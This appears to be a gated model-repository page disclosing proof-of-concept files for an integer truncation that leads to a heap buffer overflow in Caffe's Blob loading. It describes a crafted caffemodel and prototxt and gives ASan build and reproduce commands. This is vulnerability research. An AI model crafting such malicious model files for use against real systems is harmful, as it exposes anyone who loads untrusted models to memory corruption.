You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Caffe Integer Truncation PoCs

PoC files for integer truncation → heap buffer overflow in Caffe's Blob handling.

Files

int_truncation.caffemodel — BlobShape.dim=0x100000001 truncates to 1, heap overflow in FromProto
huge_dims.prototxt — Dimensions near INT32_MAX cause integer overflow in allocation

Reproduce

git clone https://github.com/BVLC/caffe && cd caffe
# Build with ASan
mkdir build && cd build
cmake .. -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address"
make -j4
# Test
./build/tools/caffe test -model huge_dims.prototxt -weights int_truncation.caffemodel

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support